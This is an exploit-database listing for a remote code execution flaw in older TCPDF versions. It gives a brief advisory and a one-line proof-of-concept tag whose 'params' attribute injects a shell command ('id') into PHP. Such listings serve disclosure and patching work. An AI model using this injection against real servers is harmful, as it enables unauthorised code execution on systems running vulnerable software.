[] NeoSense
E X P L O I T S
title author type platform port cve id

TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution

Author: apoc
type: remote
platform: linux
port: 
date_added: 2010-04-08 
date_updated: 2014-06-21 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/39315/info

TCPDF is prone to a security weakness that may allow attackers to execute arbitrary code.

An attacker can exploit this issue in conjunction with other latent vulnerabilities to execute arbitrary code with the privileges of the webserver.

Versions prior to TCPDF 4.9.006 are vulnerable.

<tcpdf method="Rect" params=");echo `id`;die(" />
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.